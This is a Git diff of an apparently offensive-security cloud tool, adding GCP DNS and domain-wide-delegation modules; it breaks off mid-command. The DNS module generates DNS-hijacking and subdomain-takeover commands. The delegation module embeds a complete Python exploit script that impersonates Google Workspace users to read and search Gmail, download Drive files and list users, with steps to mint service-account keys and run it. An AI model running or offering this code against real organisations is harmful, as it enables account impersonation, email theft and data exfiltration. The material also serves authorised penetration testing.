ds.CheckTakeoverRisks(allRecords) + + msg := fmt.Sprintf("Found %d zone(s), %d record(s)", len(allZones), len(allRecords)) + if publicCount > 0 { + msg += fmt.Sprintf(" [%d public]", publicCount) + } + if privateCount > 0 { + msg += fmt.Sprintf(" [%d private]", privateCount) + } + logger.SuccessM(msg, globals.GCP_DNS_MODULE_NAME) + + // Log security warnings + if dnssecOffCount > 0 { + logger.InfoM(fmt.Sprintf("[SECURITY] %d public zone(s) have DNSSEC disabled", dnssecOffCount), globals.GCP_DNS_MODULE_NAME) + } + if transferModeCount 
> 0 { + logger.InfoM(fmt.Sprintf("[SECURITY] %d zone(s) in DNSSEC transfer mode (vulnerable during migration)", transferModeCount), globals.GCP_DNS_MODULE_NAME) + } + if len(m.TakeoverRisks) > 0 { + logger.InfoM(fmt.Sprintf("[SECURITY] %d potential subdomain takeover risk(s) detected", len(m.TakeoverRisks)), globals.GCP_DNS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// getAllZones returns all zones from all projects +func (m *DNSModule) getAllZones() []DNSService.ZoneInfo { + var all []DNSService.ZoneInfo + for _, zones := range m.ProjectZones { + all = append(all, zones...) + } + return all +} + +// getAllRecords returns all records from all projects +func (m *DNSModule) getAllRecords() []DNSService.RecordInfo { + var all []DNSService.RecordInfo + for _, records := range m.ProjectRecords { + all = append(all, records...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DNSModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating DNS in project: %s", projectID), globals.GCP_DNS_MODULE_NAME) + } + + ds := DNSService.New() + + // Get zones + zones, err := ds.Zones(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DNS_MODULE_NAME, + fmt.Sprintf("Could not enumerate DNS zones in project %s", projectID)) + return + } + + var projectRecords []DNSService.RecordInfo + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["dns-commands"] = &internal.LootFile{ + Name: "dns-commands", + Contents: "# Cloud DNS Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + for _, zone := range zones { + m.mu.Lock() + 
m.addZoneToLoot(projectID, zone) + m.mu.Unlock() + + // Get records for each zone (outside of lock to avoid holding mutex across API call) + records, err := ds.Records(projectID, zone.Name) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DNS_MODULE_NAME, + fmt.Sprintf("Could not enumerate DNS records in zone %s", zone.Name)) + continue + } + + projectRecords = append(projectRecords, records...) + } + + m.mu.Lock() + m.ProjectZones[projectID] = zones + m.ProjectRecords[projectID] = projectRecords + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d zone(s) in project %s", len(zones), projectID), globals.GCP_DNS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *DNSModule) addZoneToLoot(projectID string, zone DNSService.ZoneInfo) { + lootFile := m.LootMap[projectID]["dns-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# DNS ZONE: %s (%s)\n"+ + "# =============================================================================\n"+ + "# Project: %s, Visibility: %s\n", + zone.Name, zone.DNSName, + zone.ProjectID, zone.Visibility, + ) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe zone: +gcloud dns managed-zones describe %s --project=%s + +# List all record sets: +gcloud dns record-sets list --zone=%s --project=%s + +# Export all records (for offline analysis): +gcloud dns record-sets export /tmp/dns-%s.zone --zone=%s --project=%s + +# List DNSSEC config: +gcloud dns managed-zones describe %s --project=%s --format=json | jq '.dnssecConfig' + +`, zone.Name, zone.ProjectID, + zone.Name, zone.ProjectID, + zone.Name, zone.Name, zone.ProjectID, + zone.Name, zone.ProjectID, + ) + + // === EXPLOIT COMMANDS === + lootFile.Contents += 
"# === EXPLOIT COMMANDS ===\n\n" + + // DNS validation and takeover checks + lootFile.Contents += fmt.Sprintf( + "# Validate DNS resolution for the zone:\n"+ + "dig %s ANY +short\n"+ + "nslookup %s\n\n"+ + "# Check for dangling CNAME records (subdomain takeover):\n"+ + "gcloud dns record-sets list --zone=%s --project=%s --filter=\"type=CNAME\" --format=\"table(name,rrdatas)\"\n\n"+ + "# Test each CNAME for dangling records:\n"+ + "# for cname in $(gcloud dns record-sets list --zone=%s --project=%s --filter=\"type=CNAME\" --format=\"value(rrdatas)\"); do\n"+ + "# echo -n \"$cname: \"; dig +short $cname || echo \"DANGLING - potential takeover!\"\n"+ + "# done\n\n"+ + "# Check NS records (for delegation attacks):\n"+ + "dig %s NS +short\n\n", + zone.DNSName, zone.DNSName, + zone.Name, zone.ProjectID, + zone.Name, zone.ProjectID, + zone.DNSName, + ) + + // Zone modification commands + lootFile.Contents += fmt.Sprintf( + "# Add a DNS record (requires dns.changes.create):\n"+ + "gcloud dns record-sets create test.%s --zone=%s --type=A --ttl=300 --rrdatas=YOUR_IP --project=%s\n\n"+ + "# Modify existing record (DNS hijacking):\n"+ + "gcloud dns record-sets update www.%s --zone=%s --type=A --ttl=300 --rrdatas=YOUR_IP --project=%s\n\n", + zone.DNSName, zone.Name, zone.ProjectID, + zone.DNSName, zone.Name, zone.ProjectID, + ) + + if zone.Visibility == "public" { + lootFile.Contents += "# [FINDING] This is a PUBLIC zone - records are resolvable from the internet\n\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getZonesHeader returns the header for the zones table +func (m *DNSModule) getZonesHeader() []string { + return []string{ + "Project", + "Zone Name", + "DNS Name", + "Visibility", + "DNSSEC", + 
"Security", + "Networks/Peering", + "Forwarding", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +// getRecordsHeader returns the header for the records table +func (m *DNSModule) getRecordsHeader() []string { + return []string{ + "Zone", + "Name", + "Type", + "TTL", + "Data", + "Takeover Risk", + } +} + +// zonesToTableBody converts zones to table body rows +func (m *DNSModule) zonesToTableBody(zones []DNSService.ZoneInfo) [][]string { + var body [][]string + for _, zone := range zones { + dnssec := zone.DNSSECState + if dnssec == "" { + dnssec = "off" + } + + security := "-" + if zone.Visibility == "public" { + if zone.DNSSECState == "" || zone.DNSSECState == "off" { + security = "DNSSEC Disabled" + } else if zone.DNSSECState == "transfer" { + security = "Transfer Mode (Vulnerable)" + } else if zone.DNSSECState == "on" { + security = "OK" + } + } + + networkInfo := "-" + if len(zone.PrivateNetworks) > 0 { + networkInfo = strings.Join(zone.PrivateNetworks, ", ") + } else if zone.PeeringNetwork != "" { + networkInfo = fmt.Sprintf("Peering: %s", zone.PeeringNetwork) + if zone.PeeringTargetProject != "" { + networkInfo += fmt.Sprintf(" (%s)", zone.PeeringTargetProject) + } + } + + forwarding := "-" + if len(zone.ForwardingTargets) > 0 { + forwarding = strings.Join(zone.ForwardingTargets, ", ") + } + + if len(zone.IAMBindings) > 0 { + for _, binding := range zone.IAMBindings { + body = append(body, []string{ + m.GetProjectName(zone.ProjectID), zone.Name, zone.DNSName, + zone.Visibility, dnssec, security, networkInfo, forwarding, binding.Role, binding.Member, + }) + } + } else { + body = append(body, []string{ + m.GetProjectName(zone.ProjectID), zone.Name, zone.DNSName, + zone.Visibility, dnssec, security, networkInfo, forwarding, "-", "-", + }) + } + } + return body +} + +// recordsToTableBody converts records to table body rows +func (m *DNSModule) recordsToTableBody(records []DNSService.RecordInfo) [][]string { + takeoverRiskMap := 
make(map[string]DNSService.TakeoverRisk) + for _, risk := range m.TakeoverRisks { + takeoverRiskMap[risk.RecordName] = risk + } + + var body [][]string + interestingTypes := map[string]bool{"A": true, "AAAA": true, "CNAME": true, "MX": true, "TXT": true, "SRV": true} + for _, record := range records { + if !interestingTypes[record.Type] { + continue + } + + data := strings.Join(record.RRDatas, ", ") + takeoverRisk := "-" + if risk, exists := takeoverRiskMap[record.Name]; exists { + takeoverRisk = fmt.Sprintf("%s (%s)", risk.RiskLevel, risk.Service) + } + + body = append(body, []string{ + record.ZoneName, record.Name, record.Type, fmt.Sprintf("%d", record.TTL), data, takeoverRisk, + }) + } + return body +} + +// buildTablesForProject builds table files for a single project +func (m *DNSModule) buildTablesForProject(projectID string) []internal.TableFile { + zones := m.ProjectZones[projectID] + records := m.ProjectRecords[projectID] + + zonesBody := m.zonesToTableBody(zones) + recordsBody := m.recordsToTableBody(records) + + var tableFiles []internal.TableFile + if len(zonesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-zones", + Header: m.getZonesHeader(), + Body: zonesBody, + }) + } + if len(recordsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-records", + Header: m.getRecordsHeader(), + Body: recordsBody, + }) + } + return tableFiles +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *DNSModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectZones { + projectsWithData[projectID] = true + } + for projectID := 
range m.ProjectRecords { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = DNSOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_DNS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *DNSModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allZones := m.getAllZones() + allRecords := m.getAllRecords() + + zonesBody := m.zonesToTableBody(allZones) + recordsBody := m.recordsToTableBody(allRecords) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + var tableFiles []internal.TableFile + if len(zonesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-zones", + Header: m.getZonesHeader(), + Body: zonesBody, + }) + } + if len(recordsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-records", + Header: m.getRecordsHeader(), + Body: recordsBody, + }) + } + + output := DNSOutput{Table: 
tableFiles, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DNS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/domainwidedelegation.go b/gcp/commands/domainwidedelegation.go new file mode 100755 index 00000000..818c737b --- /dev/null +++ b/gcp/commands/domainwidedelegation.go @@ -0,0 +1,758 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + domainwidedelegationservice "github.com/BishopFox/cloudfox/gcp/services/domainWideDelegationService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDomainWideDelegationCommand = &cobra.Command{ + Use: globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, + Aliases: []string{"dwd", "delegation", "workspace-delegation"}, + Short: "Find service accounts with Domain-Wide Delegation to Google Workspace", + Long: `Find service accounts configured for Domain-Wide Delegation (DWD). + +Domain-Wide Delegation allows a service account to impersonate any user in a +Google Workspace domain. This is EXTREMELY powerful and a high-value target. 
+ +With DWD + a service account key, an attacker can: +- Read any user's Gmail +- Access any user's Google Drive +- View any user's Calendar +- Enumerate all users and groups via Admin Directory API +- Send emails as any user +- And much more depending on authorized scopes + +Detection Method: +- Service accounts with OAuth2 Client ID set have DWD enabled +- The actual authorized scopes are configured in Google Admin Console +- We check for naming patterns that suggest DWD purpose + +To Exploit: +1. Obtain a key for the DWD service account +2. Identify a target user email in the Workspace domain +3. Generate tokens with the target user as 'subject' +4. Access Workspace APIs as that user + +Note: Scopes must be authorized in Admin Console > Security > API Controls`, + Run: runGCPDomainWideDelegationCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DomainWideDelegationModule struct { + gcpinternal.BaseGCPModule + + ProjectDWDAccounts map[string][]domainwidedelegationservice.DWDServiceAccount // projectID -> accounts + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DomainWideDelegationOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DomainWideDelegationOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DomainWideDelegationOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDomainWideDelegationCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + if err != nil { + return + } + + module := &DomainWideDelegationModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectDWDAccounts: 
make(map[string][]domainwidedelegationservice.DWDServiceAccount), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DomainWideDelegationModule) getAllDWDAccounts() []domainwidedelegationservice.DWDServiceAccount { + var all []domainwidedelegationservice.DWDServiceAccount + for _, accounts := range m.ProjectDWDAccounts { + all = append(all, accounts...) + } + return all +} + +func (m *DomainWideDelegationModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, m.processProject) + + allAccounts := m.getAllDWDAccounts() + if len(allAccounts) == 0 { + logger.InfoM("No Domain-Wide Delegation service accounts found", globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + return + } + + // Count confirmed DWD accounts + confirmedDWD := 0 + criticalCount := 0 + for _, account := range allAccounts { + if account.DWDEnabled { + confirmedDWD++ + } + if account.RiskLevel == "CRITICAL" { + criticalCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d potential DWD service account(s) (%d confirmed)", len(allAccounts), confirmedDWD), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + + if criticalCount > 0 { + logger.InfoM(fmt.Sprintf("[CRITICAL] %d DWD accounts with keys - can impersonate Workspace users!", criticalCount), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DomainWideDelegationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking DWD service accounts in project: %s", projectID), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } + + 
m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.mu.Unlock() + + svc := domainwidedelegationservice.New() + accounts, err := svc.GetDWDServiceAccounts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, + fmt.Sprintf("Could not check DWD service accounts in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectDWDAccounts[projectID] = accounts + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS && len(accounts) > 0 { + logger.InfoM(fmt.Sprintf("Found %d DWD account(s) in project %s", len(accounts), projectID), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ + +// generateDWDPythonScript returns the Python exploit script (generated once globally) +func (m *DomainWideDelegationModule) generateDWDPythonScript() internal.LootFile { + pythonScript := `#!/usr/bin/env python3 +""" +Domain-Wide Delegation (DWD) Exploitation Script +Generated by CloudFox + +Usage: + # Interactive mode (authenticate once, run multiple actions): + python dwd_exploit.py --key-file KEY.json --subject user@domain.com + + # Single command mode: + python dwd_exploit.py --key-file KEY.json --subject user@domain.com --action read-emails + python dwd_exploit.py --key-file KEY.json --subject user@domain.com --all-scopes +""" + +import argparse +import base64 +import io +import sys +from google.oauth2 import service_account +from googleapiclient.discovery import build +from googleapiclient.http import MediaIoBaseDownload + +SCOPES = { + 'gmail_readonly': 'https://www.googleapis.com/auth/gmail.readonly', + 'gmail_send': 'https://www.googleapis.com/auth/gmail.send', + 'gmail_full': 'https://mail.google.com/', + 'drive_readonly': 'https://www.googleapis.com/auth/drive.readonly', 
+ 'drive_full': 'https://www.googleapis.com/auth/drive', + 'calendar_readonly': 'https://www.googleapis.com/auth/calendar.readonly', + 'calendar_full': 'https://www.googleapis.com/auth/calendar', + 'admin_directory_users': 'https://www.googleapis.com/auth/admin.directory.user.readonly', + 'admin_directory_groups': 'https://www.googleapis.com/auth/admin.directory.group.readonly', + 'contacts': 'https://www.googleapis.com/auth/contacts.readonly', + 'sheets': 'https://www.googleapis.com/auth/spreadsheets', +} + +class DWDExploit: + def __init__(self, key_file, subject): + self.key_file = key_file + self.subject = subject + self.services = {} + self.working_scopes = set() + print(f"\n[*] Initialized DWD exploit") + print(f" Key file: {key_file}") + print(f" Subject: {subject}") + + def get_credentials(self, scopes): + if isinstance(scopes, str): + scopes = [scopes] + return service_account.Credentials.from_service_account_file( + self.key_file, scopes=scopes, subject=self.subject + ) + + def get_service(self, service_name, version, scope): + """Get or create a cached service.""" + key = f"{service_name}_{version}_{scope}" + if key not in self.services: + creds = self.get_credentials(SCOPES[scope]) + self.services[key] = build(service_name, version, credentials=creds) + return self.services[key] + + def test_all_scopes(self): + """Test which scopes are authorized.""" + print(f"\n[*] Testing all scopes for {self.subject}...") + for scope_name, scope_url in SCOPES.items(): + print(f"\n[*] Testing: {scope_name}") + try: + creds = self.get_credentials(scope_url) + if 'gmail' in scope_name: + service = build('gmail', 'v1', credentials=creds) + results = service.users().messages().list(userId='me', maxResults=5).execute() + count = len(results.get('messages', [])) + print(f" [+] SUCCESS - Found {count} messages") + self.working_scopes.add(scope_name) + elif 'drive' in scope_name: + service = build('drive', 'v3', credentials=creds) + results = 
service.files().list(pageSize=5).execute() + count = len(results.get('files', [])) + print(f" [+] SUCCESS - Found {count} files") + self.working_scopes.add(scope_name) + elif 'calendar' in scope_name: + service = build('calendar', 'v3', credentials=creds) + results = service.calendarList().list().execute() + count = len(results.get('items', [])) + print(f" [+] SUCCESS - Found {count} calendars") + self.working_scopes.add(scope_name) + elif 'admin_directory' in scope_name: + service = build('admin', 'directory_v1', credentials=creds) + results = service.users().list(customer='my_customer', maxResults=5).execute() + count = len(results.get('users', [])) + print(f" [+] SUCCESS - Found {count} users") + self.working_scopes.add(scope_name) + else: + print(f" [+] SUCCESS - Credentials created") + self.working_scopes.add(scope_name) + except Exception as e: + print(f" [-] FAILED: {str(e)[:80]}") + + print(f"\n[+] Working scopes: {', '.join(self.working_scopes) if self.working_scopes else 'None'}") + + def read_emails(self, max_results=20): + """Read emails from user's inbox.""" + service = self.get_service('gmail', 'v1', 'gmail_readonly') + results = service.users().messages().list(userId='me', maxResults=max_results).execute() + messages = results.get('messages', []) + + print(f"\n[+] Reading {len(messages)} emails for {self.subject}:\n") + for msg in messages: + msg_data = service.users().messages().get(userId='me', id=msg['id'], format='full').execute() + headers = {h['name']: h['value'] for h in msg_data['payload']['headers']} + + print(f"{'='*60}") + print(f"From: {headers.get('From', 'N/A')}") + print(f"To: {headers.get('To', 'N/A')}") + print(f"Subject: {headers.get('Subject', 'N/A')}") + print(f"Date: {headers.get('Date', 'N/A')}") + + body = "" + if 'parts' in msg_data['payload']: + for part in msg_data['payload']['parts']: + if part['mimeType'] == 'text/plain' and 'data' in part.get('body', {}): + body = 
base64.urlsafe_b64decode(part['body']['data']).decode('utf-8', errors='ignore') + break + elif 'body' in msg_data['payload'] and 'data' in msg_data['payload']['body']: + body = base64.urlsafe_b64decode(msg_data['payload']['body']['data']).decode('utf-8', errors='ignore') + + if body: + print(f"\nBody:\n{body[:500]}{'...' if len(body) > 500 else ''}") + print() + + def search_emails(self, query): + """Search emails with a query.""" + service = self.get_service('gmail', 'v1', 'gmail_readonly') + results = service.users().messages().list(userId='me', q=query, maxResults=20).execute() + messages = results.get('messages', []) + + print(f"\n[+] Found {len(messages)} emails matching '{query}':\n") + for msg in messages: + msg_data = service.users().messages().get(userId='me', id=msg['id'], format='metadata').execute() + headers = {h['name']: h['value'] for h in msg_data['payload']['headers']} + print(f" - {headers.get('Subject', 'N/A')[:60]} | From: {headers.get('From', 'N/A')[:30]}") + + def list_drive(self, max_results=50): + """List files in user's Drive.""" + service = self.get_service('drive', 'v3', 'drive_readonly') + results = service.files().list( + pageSize=max_results, + fields="files(id, name, mimeType, size, modifiedTime)" + ).execute() + files = results.get('files', []) + + print(f"\n[+] Found {len(files)} files in Drive:\n") + for f in files: + size = f.get('size', 'N/A') + if size != 'N/A': + size = f"{int(size)/1024:.1f}KB" + print(f" [{f['id'][:12]}] {f['name'][:45]} ({f['mimeType'].split('.')[-1]}) {size}") + + def download_file(self, file_id, output_path=None): + """Download a file from Drive.""" + service = self.get_service('drive', 'v3', 'drive_readonly') + file_meta = service.files().get(fileId=file_id, fields='name,mimeType').execute() + filename = output_path or file_meta['name'] + + request = service.files().get_media(fileId=file_id) + fh = io.BytesIO() + downloader = MediaIoBaseDownload(fh, request) + + done = False + while not done: + status, 
done = downloader.next_chunk()
+            print(f"\r[*] Download: {int(status.progress() * 100)}%", end='')
+
+        with open(filename, 'wb') as f:
+            f.write(fh.getvalue())
+        print(f"\n[+] Downloaded: {filename}")
+
+    def list_users(self):
+        """List all Workspace users."""
+        service = self.get_service('admin', 'directory_v1', 'admin_directory_users')
+        results = service.users().list(customer='my_customer', maxResults=200).execute()
+        users = results.get('users', [])
+
+        print(f"\n[+] Found {len(users)} Workspace users:\n")
+        for user in users:
+            name = user.get('name', {}).get('fullName', 'N/A')
+            admin = "ADMIN" if user.get('isAdmin') else ""
+            print(f"  - {user.get('primaryEmail'):<40} {name:<25} {admin}")
+
+    def list_calendars(self):
+        """List user's calendars."""
+        service = self.get_service('calendar', 'v3', 'calendar_readonly')
+        results = service.calendarList().list().execute()
+        calendars = results.get('items', [])
+
+        print(f"\n[+] Found {len(calendars)} calendars:\n")
+        for cal in calendars:
+            print(f"  - {cal.get('summary', 'N/A')} ({cal.get('id', 'N/A')[:40]})")
+
+    def list_events(self, max_results=20):
+        """List upcoming calendar events."""
+        from datetime import datetime
+        service = self.get_service('calendar', 'v3', 'calendar_readonly')
+        now = datetime.utcnow().isoformat() + 'Z'
+        results = service.events().list(
+            calendarId='primary', timeMin=now, maxResults=max_results, singleEvents=True, orderBy='startTime'
+        ).execute()
+        events = results.get('items', [])
+
+        print(f"\n[+] Found {len(events)} upcoming events:\n")
+        for event in events:
+            start = event['start'].get('dateTime', event['start'].get('date'))
+            print(f"  - {start[:16]} | {event.get('summary', 'No title')}")
+
+    def change_subject(self, new_subject):
+        """Change the impersonated user."""
+        self.subject = new_subject
+        self.services = {}  # Clear cached services
+        print(f"\n[+] Now impersonating: {new_subject}")
+
+    def interactive(self):
+        """Interactive mode - run multiple actions without 
re-authenticating.""" + print("\n" + "="*60) + print(" DWD Interactive Mode") + print(" Type 'help' for commands, 'quit' to exit") + print("="*60) + + while True: + try: + cmd = input(f"\n[{self.subject}]> ").strip().lower() + except (EOFError, KeyboardInterrupt): + print("\n[*] Exiting...") + break + + if not cmd: + continue + + parts = cmd.split(maxsplit=1) + action = parts[0] + args = parts[1] if len(parts) > 1 else "" + + try: + if action in ('quit', 'exit', 'q'): + print("[*] Exiting...") + break + elif action == 'help': + self.print_help() + elif action == 'test' or action == 'scopes': + self.test_all_scopes() + elif action == 'emails' or action == 'inbox': + self.read_emails() + elif action == 'search': + if not args: + args = input(" Search query: ").strip() + self.search_emails(args) + elif action == 'drive' or action == 'files': + self.list_drive() + elif action == 'download': + if not args: + args = input(" File ID: ").strip() + self.download_file(args) + elif action == 'users': + self.list_users() + elif action == 'calendars': + self.list_calendars() + elif action == 'events': + self.list_events() + elif action == 'subject' or action == 'impersonate': + if not args: + args = input(" New subject email: ").strip() + self.change_subject(args) + elif action == 'whoami': + print(f"\n Key file: {self.key_file}") + print(f" Subject: {self.subject}") + print(f" Working scopes: {', '.join(self.working_scopes) if self.working_scopes else 'Not tested yet'}") + else: + print(f" Unknown command: {action}. Type 'help' for commands.") + except Exception as e: + print(f" [!] 
Error: {e}") + + def print_help(self): + print(""" + Commands: + test / scopes - Test which scopes are authorized + emails / inbox - Read inbox emails + search - Search emails (e.g., search password) + drive / files - List Google Drive files + download - Download a Drive file + users - List all Workspace users (requires admin) + calendars - List calendars + events - List upcoming calendar events + subject - Switch to impersonate a different user + whoami - Show current configuration + help - Show this help + quit / exit / q - Exit interactive mode + """) + + +def main(): + parser = argparse.ArgumentParser(description='DWD Exploitation Script') + parser.add_argument('--key-file', required=True, help='Service account key JSON file') + parser.add_argument('--subject', required=True, help='Email of user to impersonate') + parser.add_argument('--all-scopes', action='store_true', help='Test all scopes and exit') + parser.add_argument('--action', choices=[ + 'read-emails', 'search-emails', 'list-drive', 'download-file', + 'list-users', 'list-calendars', 'list-events' + ], help='Single action to perform (non-interactive)') + parser.add_argument('--query', help='Search query for search-emails') + parser.add_argument('--file-id', help='File ID for download-file') + parser.add_argument('--output', help='Output path for download-file') + args = parser.parse_args() + + exploit = DWDExploit(args.key_file, args.subject) + + # Single action modes + if args.all_scopes: + exploit.test_all_scopes() + elif args.action == 'read-emails': + exploit.read_emails() + elif args.action == 'search-emails': + if not args.query: + parser.error('--query is required for search-emails') + exploit.search_emails(args.query) + elif args.action == 'list-drive': + exploit.list_drive() + elif args.action == 'download-file': + if not args.file_id: + parser.error('--file-id is required for download-file') + exploit.download_file(args.file_id, args.output) + elif args.action == 'list-users': + 
exploit.list_users() + elif args.action == 'list-calendars': + exploit.list_calendars() + elif args.action == 'list-events': + exploit.list_events() + else: + # No action specified - enter interactive mode + exploit.interactive() + +if __name__ == '__main__': + main() +` + + return internal.LootFile{ + Name: "dwd_exploit.py", + Contents: pythonScript, + } +} + +// generateDWDCommands generates the commands file for a specific project's accounts +func (m *DomainWideDelegationModule) generateDWDCommands(accounts []domainwidedelegationservice.DWDServiceAccount) internal.LootFile { + var commands strings.Builder + commands.WriteString(`# Domain-Wide Delegation (DWD) Exploitation Commands +# Generated by CloudFox +# WARNING: Only use with proper authorization + +# ============================================================================= +# STEP 1: INSTALL DEPENDENCIES +# ============================================================================= +pip install google-auth google-auth-oauthlib google-api-python-client + +# ============================================================================= +# STEP 2: CREATE A SERVICE ACCOUNT KEY (if needed) +# ============================================================================= +# Replace with the service account email from above + +gcloud iam service-accounts keys create sa-key.json \ + --iam-account= + +# ============================================================================= +# STEP 3: RUN THE EXPLOIT SCRIPT (INTERACTIVE MODE) +# ============================================================================= +# Replace: +# sa-key.json - Path to the service account key file +# admin@domain.com - Email of Workspace user to impersonate + +# Start interactive mode (recommended - authenticate once, run many commands): +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com + +# Interactive commands: +# test - Test which scopes are authorized +# emails - Read inbox emails +# search - Search emails 
(e.g., search password reset) +# drive - List Google Drive files +# download - Download a Drive file +# users - List all Workspace users +# calendars - List calendars +# events - List upcoming calendar events +# subject - Switch to impersonate a different user +# whoami - Show current config +# quit - Exit + +# ============================================================================= +# STEP 3 (ALT): SINGLE COMMAND MODE +# ============================================================================= +# If you prefer single commands instead of interactive mode: + +# Test all scopes: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --all-scopes + +# Read emails: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action read-emails + +# Search emails: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action search-emails --query "password" + +# List Drive files: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action list-drive + +# Download a file: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action download-file --file-id FILE_ID + +# List Workspace users: +python 